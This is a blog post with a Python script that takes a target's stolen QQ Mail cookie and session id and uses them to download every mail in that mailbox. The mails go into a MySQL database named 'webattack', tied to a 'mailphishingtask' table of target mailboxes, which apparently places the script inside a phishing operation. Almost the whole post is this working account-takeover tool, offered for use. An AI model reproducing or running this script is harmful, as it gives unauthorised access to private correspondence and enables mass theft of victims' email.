1. 程式人生 > >利用cookie爬取QQ郵箱的python指令碼

利用cookie爬取QQ郵箱的python指令碼

目標郵箱的cookie和sid分別儲存在同一目錄下的txt檔案(cookie.txt、sid.txt)中。

以下是全部程式碼

# -*- coding: utf-8 -*-
import requests
import time
from bs4 import BeautifulSoup
import re
import sys
import json
import pymysql


# Matches the value attribute of a serialized <input .../> tag when it is the
# last attribute before the closing "/>".
_INPUT_VALUE_RE = re.compile(r'value="(.*?)"/>')

# Length of the `value` strings that get_mailid() treats as mail ids.
_MAILID_LENGTH = 30


def _read_text(path):
    """Return the contents of *path* with surrounding whitespace removed.

    Stripping matters because a trailing newline would otherwise end up
    inside an HTTP header value or a query-string parameter.
    """
    with open(path, 'r') as handle:
        return handle.read().strip()


def ct_content(url, payload):
    """GET *url* with the cookie stored in ``cookie.txt`` and return the body.

    Args:
        url: Address to request.
        payload: Query string (or mapping) passed to requests as ``params``.

    Returns:
        The response body decoded as text (``response.text``).
    """
    header = {
        'Referer': 'https://mail.qq.com/cgi-bin/frame_html?t=newwin_frame&sid=M6EI2PkDteRzaXkj&url=/cgi-bin/readmail?folderid=1%26folderkey=1%26t=readmail%26mailid=ZC4411-kQP8LA2p7r_ALDxmjE83W82%26mode=pre%26maxage=3600%26base=12.870000000000001%26ver=36726',
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36',
        'Upgrade-Insecure-Requests': '1',
    }
    header['cookie'] = _read_text('cookie.txt')

    session = requests.session()
    try:
        response = session.get(url, headers=header, params=payload, timeout=80)
        return response.text
    finally:
        # Release pooled connections; the session is not reused across calls.
        session.close()


def get_mailid(sid, pages=1):
    """Collect mail ids from the first *pages* pages of the mail list.

    Args:
        sid: Session id inserted into the query string.
        pages: Number of list pages to request, starting at page 0.

    Returns:
        A list of every 30-character ``value`` found on an ``<input>`` tag.
    """
    url = "https://mail.qq.com/cgi-bin/mail_list?"
    ids = []
    for page in range(pages):
        # NOTE(review): "sid=<sid>=personal" looks like a garbled query
        # fragment; it is kept exactly as found because the intended text
        # cannot be determined from this file -- confirm against a real request.
        # The page placeholder used to be {0:s}, which repeated the sid.
        payload = 'sid={0:s}=personal&folderkey=-3&page={1:d}&stype=myfolders&ver=333674.0&cachemod=maillist&cacheage=7200&r='.format(sid, page)
        html = ct_content(url, payload)
        soup = BeautifulSoup(html, 'lxml')
        for tag in soup.find_all("input"):
            for value in _INPUT_VALUE_RE.findall(str(tag)):
                if len(value) == _MAILID_LENGTH:
                    ids.append(value)
    print(len(ids))
    return ids


def get_sid():
    """Return the session id stored in ``sid.txt``."""
    return _read_text('sid.txt')


def get_mail(mailid, sid):
    """Fetch the ``readmail`` page for *mailid* and return its HTML.

    Every occurrence of ``gb18030`` in the returned text is replaced with
    ``utf-8``.
    """
    url = "https://mail.qq.com/cgi-bin/readmail?"
    payload = 'folderid=1&folderkey=1&t=readmail&mailid={0:s}&mode=pre&maxage=3600&base=12.57&ver=16137&sid={1:s}'.format(mailid, sid)
    html = ct_content(url, payload)
    return html.replace("gb18030", "utf-8")


def get_sub(html):
    """Return the text of the first ``<title>`` in *html*, or None if absent."""
    soup = BeautifulSoup(html, 'lxml')
    title = soup.find("title")
    if title is None:
        return None
    return title.string


def fs(key, cook):
    """Return the value of cookie *key* from the cookie header string *cook*.

    The header is split into ``name=value`` pairs on ``;`` and names are
    compared exactly, so ``sid`` does not match ``ssid`` and ``uin`` does not
    match ``pt2gguin``. The last pair needs no trailing ``;``.

    Returns:
        The cookie value, or an empty string when *key* is not present.
    """
    for pair in cook.split(';'):
        name, sep, value = pair.strip().partition('=')
        if sep and name == key:
            return value
    return ''


def get_cookie():
    """Return a dict holding the ``sid`` cookie read from ``cookie.txt``."""
    raw = _read_text('cookie.txt')
    return {'sid': fs('sid', raw)}


def main():
    """Download the listed mails and store them for the task given on argv.

    ``sys.argv[1]`` is the task key looked up in ``mailphishingtask``; one
    row per fetched mail is then inserted into ``mails``. Exits with a
    message when the key is missing or matches no task.
    """
    if sys.version_info[0] == 2:
        # Python 2 only: switch the implicit str/unicode codec to UTF-8.
        # Neither call exists on Python 3, hence the version guard.
        reload(sys)  # noqa: F821
        sys.setdefaultencoding('utf8')

    if len(sys.argv) < 2:
        sys.exit('usage: %s <task key>' % sys.argv[0])
    key = sys.argv[1]

    conn = pymysql.connect(host='127.0.0.1', port=3306, user='root',
                           passwd='root', db='webattack', charset='utf8')
    try:
        sid = get_sid()
        mailids = get_mailid(sid)
        print(len(mailids))

        fetched = []
        for mail_id in mailids:
            mail = get_mail(mail_id, sid)
            fetched.append((mail_id, mail, get_sub(mail)))

        cursor = conn.cursor()
        try:
            # The key comes from the command line: let the driver quote it
            # instead of interpolating it into the statement.
            cursor.execute(
                "SELECT id,uid,target FROM mailphishingtask where tkey=%s ;",
                (key,),
            )
            data = cursor.fetchone()
            if data is None:
                sys.exit('no task found for key %r' % key)
            tid = int(data[0])
            uid = int(data[1])
            mailbox = data[2]
            addtime = int(time.time())

            rows = [
                (mail_id, mail, sub, tid, uid, mailbox, addtime)
                for mail_id, mail, sub in fetched
            ]
            if rows:
                sql = 'INSERT INTO mails (mailid,mailcontent,sub,pid,uid,mailbox,addtime) VALUES (%s,%s,%s,%s,%s,%s,%s)'
                cursor.executemany(sql, rows)
        finally:
            cursor.close()
        conn.commit()
    finally:
        conn.close()


if __name__ == '__main__':
    main()